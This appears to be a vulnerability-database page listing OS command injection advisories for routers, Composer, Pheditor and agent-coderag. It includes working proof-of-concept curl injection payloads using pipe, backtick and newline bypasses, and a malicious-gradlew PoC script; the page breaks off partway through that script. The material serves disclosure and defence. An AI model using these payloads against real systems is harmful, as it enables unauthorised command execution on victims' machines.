Common Weakness Enumeration

CWE-78

Allowed

Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')

Abstraction: Base · Status: Stable

The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component.

8265 vulnerabilities reference this CWE, most recent first.

GHSA-WFW7-Q64Q-6RFC

Vulnerability from github – Published: 2022-05-24 17:07 – Updated: 2023-02-01 15:30
VLAI
Details

Intellian Aptus Web 1.24 allows remote attackers to execute arbitrary OS commands via the Q field within JSON data to the cgi-bin/libagent.cgi URI. NOTE: a valid sid cookie for a login to the intellian default account might be needed.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2020-7980"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-78"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2020-01-25T19:15:00Z",
    "severity": "HIGH"
  },
  "details": "Intellian Aptus Web 1.24 allows remote attackers to execute arbitrary OS commands via the Q field within JSON data to the cgi-bin/libagent.cgi URI. NOTE: a valid sid cookie for a login to the intellian default account might be needed.",
  "id": "GHSA-wfw7-q64q-6rfc",
  "modified": "2023-02-01T15:30:25Z",
  "published": "2022-05-24T17:07:20Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-7980"
    },
    {
      "type": "WEB",
      "url": "https://github.com/Xh4H/Satellian-CVE-2020-7980"
    },
    {
      "type": "WEB",
      "url": "https://sku11army.blogspot.com/2020/01/intellian-aptus-web-rce-intellian.html"
    },
    {
      "type": "WEB",
      "url": "http://packetstormsecurity.com/files/156143/Satellian-1.12-Remote-Code-Execution.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-WFXQ-5CV4-254V

Vulnerability from github – Published: 2024-08-30 03:30 – Updated: 2024-08-30 03:30
VLAI
Details

** UNSUPPORTED WHEN ASSIGNED ** A command injection vulnerability in the functions formSysCmd(), formUpgradeCert(), and formDelcert() in the Zyxel NWA1100-N firmware version 1.00(AACE.1)C0 could allow an unauthenticated attacker to execute some OS commands to access system files on an affected device.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-8234"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-78"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-08-30T01:15:03Z",
    "severity": "HIGH"
  },
  "details": "** UNSUPPORTED WHEN ASSIGNED ** A command injection vulnerability in the functions formSysCmd(), formUpgradeCert(), and formDelcert() in the Zyxel NWA1100-N firmware version 1.00(AACE.1)C0 could allow an unauthenticated attacker to execute some OS commands to access system files on an affected device.",
  "id": "GHSA-wfxq-5cv4-254v",
  "modified": "2024-08-30T03:30:44Z",
  "published": "2024-08-30T03:30:44Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-8234"
    },
    {
      "type": "WEB",
      "url": "https://github.com/GroundCTL2MajorTom/pocs/blob/main/zyxel_NWAW1100-N_rce.md"
    },
    {
      "type": "WEB",
      "url": "https://webservice.zyxel.com/eol/ArchivedEOLModel.pdf"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-WG23-CR77-5R75

Vulnerability from github – Published: 2022-05-24 17:26 – Updated: 2022-05-25 00:00
VLAI
Details

A command injection vulnerability exists in EdgeSwitch firmware <v1.9.0 that allowed an authenticated read-only user to execute arbitrary shell commands over the HTTP interface, allowing them to escalate privileges.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2020-8233"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-78"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2020-08-17T16:15:00Z",
    "severity": "HIGH"
  },
  "details": "A command injection vulnerability exists in EdgeSwitch firmware \u003cv1.9.0 that allowed an authenticated read-only user to execute arbitrary shell commands over the HTTP interface, allowing them to escalate privileges.",
  "id": "GHSA-wg23-cr77-5r75",
  "modified": "2022-05-25T00:00:32Z",
  "published": "2022-05-24T17:26:05Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-8233"
    },
    {
      "type": "WEB",
      "url": "https://community.ui.com/releases/EdgeMAX-EdgeSwitch-Firmware-v1-9-1-v1-9-1/8a87dfc5-70f5-4055-8d67-570db1f5695c"
    },
    {
      "type": "WEB",
      "url": "https://community.ui.com/releases/Security-advisory-bulletin-014-014/1c32c056-2c64-4e60-ac23-ce7d8f387821"
    },
    {
      "type": "WEB",
      "url": "https://www.ui.com/download/edgemax"
    },
    {
      "type": "WEB",
      "url": "http://lists.opensuse.org/opensuse-security-announce/2020-10/msg00019.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-WG2X-9R62-MPX4

Vulnerability from github – Published: 2022-05-24 17:41 – Updated: 2022-08-06 00:00
VLAI
Details

Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV016, RV042, RV042G, RV082, RV320, and RV325 Routers could allow an authenticated, remote attacker to inject arbitrary commands that are executed with root privileges. These vulnerabilities are due to improper validation of user-supplied input in the web-based management interface. An attacker could exploit these vulnerabilities by sending crafted HTTP requests to a targeted device. A successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system. To exploit these vulnerabilities, an attacker would need to have valid administrator credentials on an affected device.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2021-1314"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-20",
      "CWE-77",
      "CWE-78"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2021-02-04T17:15:00Z",
    "severity": "HIGH"
  },
  "details": "Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV016, RV042, RV042G, RV082, RV320, and RV325 Routers could allow an authenticated, remote attacker to inject arbitrary commands that are executed with root privileges. These vulnerabilities are due to improper validation of user-supplied input in the web-based management interface. An attacker could exploit these vulnerabilities by sending crafted HTTP requests to a targeted device. A successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system. To exploit these vulnerabilities, an attacker would need to have valid administrator credentials on an affected device.",
  "id": "GHSA-wg2x-9r62-mpx4",
  "modified": "2022-08-06T00:00:38Z",
  "published": "2022-05-24T17:41:01Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-1314"
    },
    {
      "type": "WEB",
      "url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-rv-command-inject-BY4c5zd"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-WG36-WVJ6-R67P

Vulnerability from github – Published: 2026-04-14 20:03 – Updated: 2026-04-16 21:54
VLAI
Summary
Composer has a command injection via malicious perforce repository
Details

Impact

The Perforce::generateP4Command() method constructed shell commands by interpolating user-supplied Perforce connection parameters (port, user, client) without proper escaping. An attacker controlling a repository configuration in a malicious composer.json declaring a Perforce VCS repository could inject arbitrary commands through these values, leading to command execution in the context of the user running Composer. Composer would execute these injected commands even if Perforce is not installed.

VCS repositories are only loaded from the root composer.json file located in the directory you execute Composer commands in and from the composer config directory (e.g. ~/.config/composer/composer.json). So this vulnerability cannot be exploited through composer.json files of packages installed as dependencies.

You are at risk of command execution if you run Composer commands on untrusted projects with attacker supplied composer.json files, regardless of whether you or any of your dependencies use Perforce.

Patches

Fixed in Composer 2.2.27 (2.2 LTS) and 2.9.6 (mainline)

Workarounds

  • Carefully inspect composer.json files before running Composer on them. Verify that Perforce-related fields contain valid values.
  • Only run Composer commands on projects from trusted sources.
Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "composer/composer"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.3.0"
            },
            {
              "fixed": "2.9.6"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "composer/composer"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "1.0.0"
            },
            {
              "fixed": "2.2.27"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-40176"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-20",
      "CWE-78"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-14T20:03:08Z",
    "nvd_published_at": "2026-04-15T21:17:27Z",
    "severity": "HIGH"
  },
  "details": "### Impact\nThe `Perforce::generateP4Command()` method constructed shell commands by interpolating user-supplied Perforce connection parameters (port, user, client) without proper escaping. An attacker controlling a repository configuration in a malicious composer.json declaring a Perforce VCS repository could inject arbitrary commands through these values, leading to command execution in the context of the user running Composer. Composer would execute these injected commands even if Perforce is not installed.\n\nVCS repositories are only loaded from the root composer.json file located in the directory you execute Composer commands in and from the composer config directory (e.g. `~/.config/composer/composer.json`). So this vulnerability cannot be exploited through composer.json files of packages installed as dependencies.\n\nYou are at risk of command execution if you run Composer commands on untrusted projects with attacker supplied composer.json files, regardless of whether you or any of your dependencies use Perforce.\n\n### Patches\nFixed in Composer 2.2.27 (2.2 LTS) and 2.9.6 (mainline)\n\n### Workarounds\n- Carefully inspect composer.json files before running Composer on them. Verify that Perforce-related fields contain valid values.\n- Only run Composer commands on projects from trusted sources.",
  "id": "GHSA-wg36-wvj6-r67p",
  "modified": "2026-04-16T21:54:58Z",
  "published": "2026-04-14T20:03:08Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/composer/composer/security/advisories/GHSA-wg36-wvj6-r67p"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-40176"
    },
    {
      "type": "WEB",
      "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/composer/composer/CVE-2026-40176.yaml"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/composer/composer"
    },
    {
      "type": "WEB",
      "url": "https://github.com/composer/composer/releases/tag/2.9.6"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Composer has a command injection via malicious perforce repository"
}

GHSA-WG4W-WR5Q-6VJC

Vulnerability from github – Published: 2026-07-16 20:10 – Updated: 2026-07-16 20:10
VLAI
Summary
Pheditor: Incomplete command sanitization in terminal feature allows RCE via pipe operator, backtick substitution, and newline injection
Details

Summary

The terminal feature in Pheditor uses an incomplete character blocklist to sanitize user-supplied commands before passing them to shell_exec(). After the fix for GHSA-9643-6xjp-vx57 (which added $ to the blocklist), the characters | (single pipe), ` (backtick), and the newline byte (0x0A) remain unblocked. An authenticated user with the terminal permission (enabled by default) can leverage any of these to bypass the TERMINAL_COMMANDS allowlist and execute arbitrary OS commands as the web server user.

Details

Tested repository: https://github.com/pheditor/pheditor

Tested commit: e538f05b6faec99e5b23726bc9c17d6b57774297 (current HEAD on main)

Affected version: Pheditor 2.0.1+

The terminal handler receives $_POST['command'] and passes it to shell_exec() at pheditor.php:586:

$output = shell_exec((empty($dir) ? null : 'cd ' . escapeshellarg($dir) . ' && ') . $command . ' && echo \ ; pwd');

The blocklist at pheditor.php:557 checks for &, ;, ||, and $, but does not block |, `, or newline (0x0A):

if (strpos($command, '&') !== false || strpos($command, ';') !== false || strpos($command, '||') !== false || strpos($command, '$') !== false) {
    echo json_error("Illegal character(s) in command (& ; ||)\n");
    exit;
}

The TERMINAL_COMMANDS prefix check at pheditor.php:566-573 only validates that the command starts with an allowed name. All three bypasses start with a whitelisted command prefix.

Bypass 1 — Single pipe |: The filter checks for || but not single |. Payload ls | id passes both the blocklist and the whitelist (starts with ls). The shell executes: cd '<dir>' && ls | id && echo \ ; pwd, running id.

Bypass 2 — Backtick `: Backtick is not in the blocklist. Payload echo `id` passes the blocklist and whitelist (starts with echo). The shell executes id inside backtick substitution.

Bypass 3 — Newline 0x0A: A literal newline byte is not in the blocklist. Payload ls\ntouch /tmp/proof (where \n is 0x0A) passes both checks. Only the first line is validated against the whitelist. The second line runs as an independent command.

PoC

Environment: Any system running PHP 8.x with pheditor.php deployed and shell_exec() enabled.

Setup:

git clone https://github.com/pheditor/pheditor /tmp/pheditor-test
cd /tmp/pheditor-test
php -S localhost:8080 pheditor.php &

Authenticate (default password admin):

curl -s -c /tmp/cookies.txt -X POST http://localhost:8080/pheditor.php -d "pheditor_password=admin" -L > /dev/null
TOKEN=$(curl -s -b /tmp/cookies.txt http://localhost:8080/pheditor.php | grep -o 'token = "[a-f0-9]*"' | grep -o '"[a-f0-9]*"' | tr -d '"')

Bypass 1 (pipe |):

curl -s -b /tmp/cookies.txt -X POST http://localhost:8080/pheditor.php \
  --data-urlencode "action=terminal" \
  --data-urlencode "token=$TOKEN" \
  --data-urlencode "command=ls | id" \
  --data-urlencode "dir="

Expected: {"error":false,"message":"OK","result":"uid=... gid=...\n",...}id output proves RCE.

Bypass 2 (backtick):

curl -s -b /tmp/cookies.txt -X POST http://localhost:8080/pheditor.php \
  --data-urlencode "action=terminal" \
  --data-urlencode "token=$TOKEN" \
  --data-urlencode 'command=echo `id`' \
  --data-urlencode "dir="

Expected: Same id output in response.

Bypass 3 (newline 0x0A):

curl -s -b /tmp/cookies.txt -X POST http://localhost:8080/pheditor.php \
  --data-urlencode "action=terminal" \
  --data-urlencode "token=$TOKEN" \
  --data-urlencode $'command=ls\nid' \
  --data-urlencode "dir="

Expected: Same id output in response.

Control (blocked command without bypass):

curl -s -b /tmp/cookies.txt -X POST http://localhost:8080/pheditor.php \
  --data-urlencode "action=terminal" \
  --data-urlencode "token=$TOKEN" \
  --data-urlencode "command=whoami" \
  --data-urlencode "dir="

Expected: {"error":true,"message":"Command not allowed..."} — allowlist enforced.

Cleanup:

kill %1; rm -rf /tmp/pheditor-test /tmp/cookies.txt

Impact

OS Command Injection (CWE-78). Any authenticated Pheditor user with the terminal permission (enabled by default) can bypass the TERMINAL_COMMANDS allowlist and execute arbitrary OS commands as the web server user. This is a bypass of the partial fix for GHSA-9643-6xjp-vx57 — that fix addressed $() substitution but three additional shell metacharacters remain unblocked.

Attacker privileges: Authenticated user (PR:L). Combined with default password admin, effectively PR:N.

Impact: Full read/write/execute access as the web server user. Confidentiality: High (read any accessible file). Integrity: High (write/delete files, deploy webshells). Availability: High (disrupt services).

Suggested remediation: Parse the command into executable + arguments, validate the executable against TERMINAL_COMMANDS with exact match, pass each argument through escapeshellarg(), or use proc_open() with an argument array to avoid shell interpretation entirely.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "pheditor/pheditor"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.0.1"
            },
            {
              "fixed": "2.0.6"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-55578"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-78"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-07-16T20:10:47Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "### Summary\n\nThe terminal feature in Pheditor uses an incomplete character blocklist to sanitize user-supplied commands before passing them to `shell_exec()`. After the fix for GHSA-9643-6xjp-vx57 (which added `$` to the blocklist), the characters `|` (single pipe), `` ` `` (backtick), and the newline byte (`0x0A`) remain unblocked. An authenticated user with the `terminal` permission (enabled by default) can leverage any of these to bypass the `TERMINAL_COMMANDS` allowlist and execute arbitrary OS commands as the web server user.\n\n### Details\n\nTested repository: https://github.com/pheditor/pheditor\n\nTested commit: `e538f05b6faec99e5b23726bc9c17d6b57774297` (current HEAD on `main`)\n\nAffected version: Pheditor 2.0.1+\n\nThe terminal handler receives `$_POST[\u0027command\u0027]` and passes it to `shell_exec()` at `pheditor.php:586`:\n\n```php\n$output = shell_exec((empty($dir) ? null : \u0027cd \u0027 . escapeshellarg($dir) . \u0027 \u0026\u0026 \u0027) . $command . \u0027 \u0026\u0026 echo \\ ; pwd\u0027);\n```\n\nThe blocklist at `pheditor.php:557` checks for `\u0026`, `;`, `||`, and `$`, but does not block `|`, `` ` ``, or newline (`0x0A`):\n\n```php\nif (strpos($command, \u0027\u0026\u0027) !== false || strpos($command, \u0027;\u0027) !== false || strpos($command, \u0027||\u0027) !== false || strpos($command, \u0027$\u0027) !== false) {\n    echo json_error(\"Illegal character(s) in command (\u0026 ; ||)\\n\");\n    exit;\n}\n```\n\nThe `TERMINAL_COMMANDS` prefix check at `pheditor.php:566-573` only validates that the command starts with an allowed name. All three bypasses start with a whitelisted command prefix.\n\n**Bypass 1 \u2014 Single pipe `|`:**\nThe filter checks for `||` but not single `|`. Payload `ls | id` passes both the blocklist and the whitelist (starts with `ls`). The shell executes: `cd \u0027\u003cdir\u003e\u0027 \u0026\u0026 ls | id \u0026\u0026 echo \\ ; pwd`, running `id`.\n\n**Bypass 2 \u2014 Backtick `` ` ``:**\nBacktick is not in the blocklist. Payload `` echo `id` `` passes the blocklist and whitelist (starts with `echo`). The shell executes `id` inside backtick substitution.\n\n**Bypass 3 \u2014 Newline `0x0A`:**\nA literal newline byte is not in the blocklist. Payload `ls\\ntouch /tmp/proof` (where `\\n` is 0x0A) passes both checks. Only the first line is validated against the whitelist. The second line runs as an independent command.\n\n### PoC\n\n**Environment:** Any system running PHP 8.x with pheditor.php deployed and `shell_exec()` enabled.\n\n**Setup:**\n```bash\ngit clone https://github.com/pheditor/pheditor /tmp/pheditor-test\ncd /tmp/pheditor-test\nphp -S localhost:8080 pheditor.php \u0026\n```\n\n**Authenticate** (default password `admin`):\n```bash\ncurl -s -c /tmp/cookies.txt -X POST http://localhost:8080/pheditor.php -d \"pheditor_password=admin\" -L \u003e /dev/null\nTOKEN=$(curl -s -b /tmp/cookies.txt http://localhost:8080/pheditor.php | grep -o \u0027token = \"[a-f0-9]*\"\u0027 | grep -o \u0027\"[a-f0-9]*\"\u0027 | tr -d \u0027\"\u0027)\n```\n\n**Bypass 1 (pipe `|`):**\n```bash\ncurl -s -b /tmp/cookies.txt -X POST http://localhost:8080/pheditor.php \\\n  --data-urlencode \"action=terminal\" \\\n  --data-urlencode \"token=$TOKEN\" \\\n  --data-urlencode \"command=ls | id\" \\\n  --data-urlencode \"dir=\"\n```\nExpected: `{\"error\":false,\"message\":\"OK\",\"result\":\"uid=... gid=...\\n\",...}` \u2014 `id` output proves RCE.\n\n**Bypass 2 (backtick):**\n```bash\ncurl -s -b /tmp/cookies.txt -X POST http://localhost:8080/pheditor.php \\\n  --data-urlencode \"action=terminal\" \\\n  --data-urlencode \"token=$TOKEN\" \\\n  --data-urlencode \u0027command=echo `id`\u0027 \\\n  --data-urlencode \"dir=\"\n```\nExpected: Same `id` output in response.\n\n**Bypass 3 (newline 0x0A):**\n```bash\ncurl -s -b /tmp/cookies.txt -X POST http://localhost:8080/pheditor.php \\\n  --data-urlencode \"action=terminal\" \\\n  --data-urlencode \"token=$TOKEN\" \\\n  --data-urlencode $\u0027command=ls\\nid\u0027 \\\n  --data-urlencode \"dir=\"\n```\nExpected: Same `id` output in response.\n\n**Control (blocked command without bypass):**\n```bash\ncurl -s -b /tmp/cookies.txt -X POST http://localhost:8080/pheditor.php \\\n  --data-urlencode \"action=terminal\" \\\n  --data-urlencode \"token=$TOKEN\" \\\n  --data-urlencode \"command=whoami\" \\\n  --data-urlencode \"dir=\"\n```\nExpected: `{\"error\":true,\"message\":\"Command not allowed...\"}` \u2014 allowlist enforced.\n\n**Cleanup:**\n```bash\nkill %1; rm -rf /tmp/pheditor-test /tmp/cookies.txt\n```\n\n### Impact\n\nOS Command Injection (CWE-78). Any authenticated Pheditor user with the `terminal` permission (enabled by default) can bypass the `TERMINAL_COMMANDS` allowlist and execute arbitrary OS commands as the web server user. This is a bypass of the partial fix for GHSA-9643-6xjp-vx57 \u2014 that fix addressed `$()` substitution but three additional shell metacharacters remain unblocked.\n\n**Attacker privileges:** Authenticated user (PR:L). Combined with default password `admin`, effectively PR:N.\n\n**Impact:** Full read/write/execute access as the web server user. Confidentiality: High (read any accessible file). Integrity: High (write/delete files, deploy webshells). Availability: High (disrupt services).\n\n**Suggested remediation:** Parse the command into executable + arguments, validate the executable against `TERMINAL_COMMANDS` with exact match, pass each argument through `escapeshellarg()`, or use `proc_open()` with an argument array to avoid shell interpretation entirely.",
  "id": "GHSA-wg4w-wr5q-6vjc",
  "modified": "2026-07-16T20:10:47Z",
  "published": "2026-07-16T20:10:47Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/pheditor/pheditor/security/advisories/GHSA-wg4w-wr5q-6vjc"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/pheditor/pheditor"
    },
    {
      "type": "WEB",
      "url": "https://github.com/pheditor/pheditor/releases/tag/2.0.6"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Pheditor: Incomplete command sanitization in terminal feature allows RCE via pipe operator, backtick substitution, and newline injection"
}

GHSA-WG5P-8H9P-3MR7

Vulnerability from github – Published: 2026-06-19 15:01 – Updated: 2026-06-19 15:01
VLAI
Summary
agent-coderag: Gradle Wrapper Execution During Dependency Discovery Enables Arbitrary Code Execution
Details

Gradle Wrapper Execution During Dependency Discovery Enables Arbitrary Code Execution

Summary

agent-coderag unconditionally executes a repository-controlled gradlew script during its default sync dependency-discovery flow. An attacker who can induce a victim to index a malicious Gradle repository (one containing build.gradle and a crafted gradlew) achieves arbitrary code execution with the victim's OS privileges. No authentication, no extra flags, and no elevated permissions are required; the attack fires on the default agent-coderag sync <path> invocation.

Details

The vulnerability exists across a four-step call chain in the sync command:

1. Entry point — code_rag/entry/cli.py:70

await manager.sync_dependencies(args.path or ".")

sync_dependencies() is called unconditionally before indexing. There is no opt-in flag; any agent-coderag sync invocation triggers dependency discovery.

2. Gradle project detection — code_rag/core/manager.py:40-47

The presence of a build.gradle or build.gradle.kts file in the target directory is sufficient to invoke _sync_gradle(). No additional checks are performed.

3. Wrapper selection — code_rag/core/manager.py:110-113

gradle_wrapper = root / ("gradlew.bat" if os.name == "nt" else "gradlew")
gradle_bin: Optional[str] = None
if gradle_wrapper.exists():
    gradle_bin = str(gradle_wrapper.resolve())
else:
    gradle_bin = shutil.which("gradle")

When a repository-local gradlew exists, it is unconditionally preferred over the system-installed gradle. No content validation, signature check, or integrity verification is performed on this file.

4. Execution sink — code_rag/core/manager.py:152-158

process = await asyncio.create_subprocess_exec(
    gradle_bin,
    "-q",
    "--init-script",
    str(init_script),
    "printCodeRagCP",
    cwd=str(root),
    ...
)

The attacker-controlled gradlew is executed directly via asyncio.create_subprocess_exec() with the repository root as the working directory. validate_path (code_rag/core/utils.py:7-71) only constrains the path location (directory boundary), not the content or nature of the executed binary.

The complete data flow: cli.py:277 (path input) → cli.py:313-314 (sync_cmd) → cli.py:62 (validate_path) → cli.py:70 (sync_dependencies) → manager.py:40-47 (_sync_gradle) → manager.py:110-113 (wrapper selection) → manager.py:152-158 (execution sink).

PoC

Environment setup:

python3 -m venv /tmp/acr-venv
. /tmp/acr-venv/bin/activate
pip install agent-coderag==1.3.0

rm -rf /tmp/acr-evil /tmp/acr.db /tmp/agent-coderag-poc-marker
mkdir -p /tmp/acr-evil

Build the malicious repository:

# Trigger _sync_gradle() detection
printf 'plugins { id "java" }\n' > /tmp/acr-evil/build.gradle

# Malicious gradlew: writes proof-of-exploitation marker and exits cleanly
printf '#!/bin/sh\nprintf CODERAG_RCE_SUCCESS > /tmp/agent-coderag-poc-marker\nexit 0\n' \
    > /tmp/acr-evil/gradlew
chmod +x /tmp/acr-evil/gradlew

Trigger the vulnerability (victim action):

agent-coderag --db /tmp/acr.db sync /tmp/acr-evil

Verify exploitation:

cat /tmp/agent-coderag-poc-marker
# Expected output: CODERAG_RCE_SUCCESS

Docker-based reproduction (as confirmed in Phase 2):

# Build image from repository root
docker build -t agent-coderag-vuln001 -f vuln-001/Dockerfile .

# Run PoC — exits 0 on successful exploitation
docker run --rm agent-coderag-vuln001

Phase 2 dynamic reproduction confirmed the following output:

[*] Evil repo created at /tmp/acr-evil-i560afcg
    build.gradle : 22 bytes
    gradlew      : 275 bytes  (executable=True)
[*] Running: agent-coderag --db /tmp/acr-poc.db sync /tmp/acr-evil-i560afcg
[*] agent-coderag exit code : 0
[PASS] Exploit confirmed.
       Marker file : /tmp/acr-poc-marker
       Contents    : 'CODERAG_RCE_SUCCESS'
       The malicious gradlew was executed by agent-coderag during sync.

Impact

This is an Arbitrary Code Execution (ACE) vulnerability triggered by a local attack vector. Any user who runs agent-coderag sync against an attacker-controlled directory is affected. The attack requires no authentication and no special privileges beyond the ability to supply a path argument.

Typical impacted scenarios include:

  • A developer cloning an untrusted repository and running agent-coderag sync to index it for AI-assisted code analysis.
  • A CI/CD pipeline that automatically indexes pull-request branches containing a crafted gradlew.
  • Any tooling or script that passes arbitrary paths to agent-coderag sync without user oversight.

Because the vulnerable component (agent-coderag) is a code-indexing tool intended to read repositories, victims have no expectation that indexing will execute files within the repository. This trust-boundary violation (reflected in the CVSS S:C — Changed Scope) means the impact extends beyond the tool itself to the victim's entire user session environment: confidentiality (credential theft, secret exfiltration), integrity (file modification, persistence installation), and availability (process termination, disk exhaustion) are all fully compromised.

Reproduction artifacts

Dockerfile

FROM python:3.11-slim

LABEL description="VULN-001 PoC: agent-coderag gradlew RCE reproduction"

WORKDIR /app

RUN apt-get update && apt-get install -y --no-install-recommends \
    && rm -rf /var/lib/apt/lists/*

# Install agent-coderag from local repo source (pinned to vulnerable commit)
COPY repo/ /app/repo/
RUN pip install --no-cache-dir /app/repo/

# Copy PoC script
COPY vuln-001/poc.py /app/poc.py

CMD ["python3", "/app/poc.py"]

poc.py

"""
PoC for VULN-001: agent-coderag Gradle Wrapper Execution → Arbitrary Code Execution

Vulnerability:
    agent-coderag `sync` command calls sync_dependencies() unconditionally.
    When the target directory contains a build.gradle file, _sync_gradle() is triggered.
    _sync_gradle() prefers a repository-local ./gradlew over the system gradle binary.
    The repository-controlled gradlew is executed via asyncio.create_subprocess_exec()
    without any content validation, enabling arbitrary code execution.

Data flow (source → sink):
    cli.py:70  → manager.sync_dependencies()
    manager.py:46 → _sync_gradle()
    manager.py:112-113 → gradle_bin = str(gradle_wrapper.resolve())  [untrusted file]
    manager.py:152-158 → asyncio.create_subprocess_exec(gradle_bin, ...)  [sink]

Expected outcome:
    The malicious gradlew writes a marker to /tmp/acr-poc-marker.
    If that file contains "CODERAG_RCE_SUCCESS", the exploit is confirmed.
"""

import asyncio
import os
import shutil
import stat
import subprocess
import sys
import tempfile
from pathlib import Path


MARKER_PATH = "/tmp/acr-poc-marker"
DB_PATH = "/tmp/acr-poc.db"

MALICIOUS_GRADLEW = """\
#!/bin/sh
# Malicious gradlew: writes a proof-of-exploitation marker and simulates
# enough Gradle output for agent-coderag to continue without error.
printf 'CODERAG_RCE_SUCCESS' > /tmp/acr-poc-marker
# Output a fake empty classpath so the tool does not log an error
exit 0
"""

BUILD_GRADLE = "plugins { id 'java' }\n"


def setup_evil_repo(directory: str) -> None:
    """Create a minimal attacker-controlled Gradle repository."""
    repo_path = Path(directory)
    repo_path.mkdir(parents=True, exist_ok=True)

    # build.gradle triggers _sync_gradle() in manager.py:46
    (repo_path / "build.gradle").write_text(BUILD_GRADLE)

    # gradlew will be executed by manager.py:152 instead of system gradle
    gradlew = repo_path / "gradlew"
    gradlew.write_text(MALICIOUS_GRADLEW)
    gradlew.chmod(gradlew.stat().st_mode | stat.S_IEXEC | stat.S_IXGRP | stat.S_IXOTH)

    print(f"[*] Evil repo created at {directory}")
    print(f"    build.gradle : {(repo_path / 'build.gradle').stat().st_size} bytes")
    print(f"    gradlew      : {gradlew.stat().st_size} bytes  (executable={os.access(gradlew, os.X_OK)})")


def run_agent_coderag(evil_repo: str) -> subprocess.CompletedProcess:
    """Invoke agent-coderag sync against the malicious repository."""
    cmd = ["agent-coderag", "--db", DB_PATH, "sync", evil_repo]
    print(f"[*] Running: {' '.join(cmd)}")
    result = subprocess.run(cmd, capture_output=True, text=True, timeout=60)
    return result


def check_marker() -> str | None:
    """Return the marker content if it was written by the malicious gradlew."""
    try:
        return Path(MARKER_PATH).read_text()
    except FileNotFoundError:
        return None


def main() -> int:
    # Clean up any leftovers from a previous run
    for path in (MARKER_PATH, DB_PATH):
        if os.path.exists(path):
            os.remove(path)

    evil_repo = tempfile.mkdtemp(prefix="acr-evil-")
    try:
        # Step 1 — build the attacker-controlled repository
        setup_evil_repo(evil_repo)

        # Step 2 — invoke agent-coderag (victim action: indexing an untrusted repo)
        result = run_agent_coderag(evil_repo)
        print(f"[*] agent-coderag exit code : {result.returncode}")
        if result.stdout:
            print(f"[*] stdout:\n{result.stdout.rstrip()}")
        if result.stderr:
            print(f"[*] stderr:\n{result.stderr.rstrip()}")

        # Step 3 — verify the marker was written by the malicious gradlew
        marker_content = check_marker()
